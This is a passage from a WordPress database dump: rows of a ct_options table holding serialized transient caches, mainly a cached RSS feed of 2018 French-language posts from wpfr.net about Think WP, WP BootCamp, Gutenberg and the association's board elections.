Lite\";s:4:\"type\";s:6:\"plugin\";s:4:\"slug\";s:17:\"wp-product-review\";s:8:\"installs\";i:50000;}}', 'no'),
(223, '_transient_timeout_feed_66a70e9599b658d5cc038e8074597e7c', '1546214676', 'no');
INSERT INTO `ct_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(224, '_transient_feed_66a70e9599b658d5cc038e8074597e7c', 'a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n\n\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:49:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n		\n		\n		\n		\n		\n		\n		\n		\n		\n	\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"WPFR\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"https://wpfr.net\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Site officiel de la communauté\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:13:\"lastBuildDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 30 Dec 2018 12:08:48 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"fr-FR\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:10:{i:0;a:6:{s:4:\"data\";s:39:\"\n		\n		\n		\n		\n		\n				\n		\n\n		\n		\n		\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:65:\"Think WP, le documentaire vidéo sur WordPress enfin disponible !\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"http://feedproxy.google.com/~r/WordpressFrancophone/~3/BFWuQgyALjg/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:63:\"https://wpfr.net/thinkwp-documentaire-video-wordpress/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 05 Nov 2018 13:03:41 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:9:\"WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:21:\"WordPress Francophone\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"https://wpfr.net/?p=2220300\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1538:\"Découvrez WordPress en 30 minutes au travers de ce documentaire inédit d&#8217;interviews de la communauté française. Sur une idée originale de Déborah Donnier, entrepreneurs, chefs d&#8217;entreprises, freelances, agences web, développeurs, intégrateurs&#8230; de toute la France se succèdent pour nous parler de notre CMS favori WordPress. Financé uniquement par des dons et sponsors, le projet Think<div class=\"btn btn-default read-more text-uppercase\">Lire la suite <span class=\"meta-nav\"><i class=\"fa fa-caret-right\"></i></span></div><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=BFWuQgyALjg:KhIgVVs-X9Q:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=yIl2AUoC8zA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=BFWuQgyALjg:KhIgVVs-X9Q:V_sGLiPBpWU\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=BFWuQgyALjg:KhIgVVs-X9Q:V_sGLiPBpWU\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=BFWuQgyALjg:KhIgVVs-X9Q:qj6IDK7rITs\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=qj6IDK7rITs\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=BFWuQgyALjg:KhIgVVs-X9Q:gIN9vFwOqvQ\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=BFWuQgyALjg:KhIgVVs-X9Q:gIN9vFwOqvQ\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/WordpressFrancophone/~4/BFWuQgyALjg\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Benjamin Denis\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"https://wpfr.net/thinkwp-documentaire-video-wordpress/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"4\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"https://wpfr.net/thinkwp-documentaire-video-wordpress/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:30:\"\n		\n		\n		\n		\n				\n		\n\n		\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:3:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:52:\"WP BootCamp 2018 : retours sur la deuxième édition\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"http://feedproxy.google.com/~r/WordpressFrancophone/~3/73jXJKLX5xI/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 23 Oct 2018 06:05:16 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:16:\"Association WPFR\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:9:\"WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"https://wpfr.net/?p=2215483\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1487:\"Soutenu par l&#8217;association WordPress Francophone, retours sur la seconde édition du WP BootCamp. Qu&#8217;est ce que le WP BootCamp ? Le WP BootCamp est un événement réunissant des passionnés de WordPress et du web en général sur un week-end de 3 jours. L&#8217;édition 2018, portée par Rémi Corson, Aurélien Denis et Benjamin Denis, se déroula<div class=\"btn btn-default read-more text-uppercase\">Lire la suite <span class=\"meta-nav\"><i class=\"fa fa-caret-right\"></i></span></div><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=73jXJKLX5xI:kXAjLDU4P-c:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=yIl2AUoC8zA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=73jXJKLX5xI:kXAjLDU4P-c:V_sGLiPBpWU\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=73jXJKLX5xI:kXAjLDU4P-c:V_sGLiPBpWU\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=73jXJKLX5xI:kXAjLDU4P-c:qj6IDK7rITs\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=qj6IDK7rITs\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=73jXJKLX5xI:kXAjLDU4P-c:gIN9vFwOqvQ\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=73jXJKLX5xI:kXAjLDU4P-c:gIN9vFwOqvQ\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/WordpressFrancophone/~4/73jXJKLX5xI\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Benjamin Denis\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"https://wpfr.net/wp-bootcamp-2018-retours-sur-la-deuxieme-edition/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:45:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n\n		\n		\n		\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"Tout savoir sur l’arrivée de Gutenberg en quelques points essentiels\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"http://feedproxy.google.com/~r/WordpressFrancophone/~3/i6NQjnc9uiQ/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:46:\"https://wpfr.net/wordpress-gutenberg/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 23 Apr 2018 09:00:07 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:4:{i:0;a:5:{s:4:\"data\";s:4:\"Blog\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:9:\"WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:15:\"éditeur visuel\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:9:\"Gutenberg\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"https://wpfr.net/?p=2117903\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1474:\"Gutenberg arrive à grand pas, alors voici un résumé de tout ce qu&#8217;il faut savoir sur le nouvel éditeur visuel de WordPress au travers de questions / réponses ! Difficile de marcher tranquillement dans le quartier WordPress sans entendre parler de ce fameux Gutenberg ! C&#8217;est un nouvel éditeur ? C&#8217;est un nouveau page builder<div class=\"btn btn-default read-more text-uppercase\">Lire la suite <span class=\"meta-nav\"><i class=\"fa fa-caret-right\"></i></span></div><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=i6NQjnc9uiQ:TQYicJ8IHdE:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=yIl2AUoC8zA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=i6NQjnc9uiQ:TQYicJ8IHdE:V_sGLiPBpWU\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=i6NQjnc9uiQ:TQYicJ8IHdE:V_sGLiPBpWU\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=i6NQjnc9uiQ:TQYicJ8IHdE:qj6IDK7rITs\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=qj6IDK7rITs\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=i6NQjnc9uiQ:TQYicJ8IHdE:gIN9vFwOqvQ\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=i6NQjnc9uiQ:TQYicJ8IHdE:gIN9vFwOqvQ\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/WordpressFrancophone/~4/i6NQjnc9uiQ\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"maximebj\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:42:\"https://wpfr.net/wordpress-gutenberg/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:2:\"13\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:37:\"https://wpfr.net/wordpress-gutenberg/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:39:\"\n		\n		\n		\n		\n		\n				\n		\n\n		\n		\n		\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"Résultats des élections du bureau 2018\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"http://feedproxy.google.com/~r/WordpressFrancophone/~3/qvTDw6NqY5Q/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"https://wpfr.net/resultats-elections-bureau-2018/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 05 Mar 2018 08:00:52 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:16:\"Association WPFR\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:4:\"Blog\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"https://wpfr.net/?p=2107099\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1521:\"Suite à la votation électronique qui s&#8217;est déroulée du 24 février au 3 mars 2018, nous vous communiquons les résultats pour l&#8217;élection du bureau 2018. Vous avez été 40% des adhérents à participer au vote, soit 85 suffrages exprimés. C&#8217;est pratiquement autant de votants que l&#8217;an passé avec un nombre d&#8217;adhérents moins élevé, l&#8217;abstention reste<div class=\"btn btn-default read-more text-uppercase\">Lire la suite <span class=\"meta-nav\"><i class=\"fa fa-caret-right\"></i></span></div><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=qvTDw6NqY5Q:LD0dZBWRJa4:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=yIl2AUoC8zA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=qvTDw6NqY5Q:LD0dZBWRJa4:V_sGLiPBpWU\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=qvTDw6NqY5Q:LD0dZBWRJa4:V_sGLiPBpWU\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=qvTDw6NqY5Q:LD0dZBWRJa4:qj6IDK7rITs\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=qj6IDK7rITs\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=qvTDw6NqY5Q:LD0dZBWRJa4:gIN9vFwOqvQ\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=qvTDw6NqY5Q:LD0dZBWRJa4:gIN9vFwOqvQ\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/WordpressFrancophone/~4/qvTDw6NqY5Q\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Aurélien Denis\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"https://wpfr.net/resultats-elections-bureau-2018/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:2:\"13\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"https://wpfr.net/resultats-elections-bureau-2018/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:39:\"\n		\n		\n		\n		\n		\n				\n		\n\n		\n		\n		\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"Liste des candidats au bureau 2018\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"http://feedproxy.google.com/~r/WordpressFrancophone/~3/mYCnwrPtTAY/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"https://wpfr.net/liste-candidats-bureau-2018/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 16 Feb 2018 11:45:20 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:16:\"Association WPFR\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:4:\"Blog\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"https://wpfr.net/?p=2092699\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1508:\"Les élections pour le renouvellement du bureau auront lieu du 24 février au 3 mars 2018 par voie électronique. Nous vous communiquons dès à présent la liste des candidats validée par l&#8217;actuel bureau, classés par ordre alphabétique. Les candidats Willy Bahuaud Présentation Je suis développeur full-stack. Après quelques années passées en agence à Nantes, j’ai<div class=\"btn btn-default read-more text-uppercase\">Lire la suite <span class=\"meta-nav\"><i class=\"fa fa-caret-right\"></i></span></div><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=mYCnwrPtTAY:g4F7i0PDxEQ:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=yIl2AUoC8zA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=mYCnwrPtTAY:g4F7i0PDxEQ:V_sGLiPBpWU\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=mYCnwrPtTAY:g4F7i0PDxEQ:V_sGLiPBpWU\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=mYCnwrPtTAY:g4F7i0PDxEQ:qj6IDK7rITs\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=qj6IDK7rITs\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=mYCnwrPtTAY:g4F7i0PDxEQ:gIN9vFwOqvQ\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=mYCnwrPtTAY:g4F7i0PDxEQ:gIN9vFwOqvQ\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/WordpressFrancophone/~4/mYCnwrPtTAY\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Aurélien 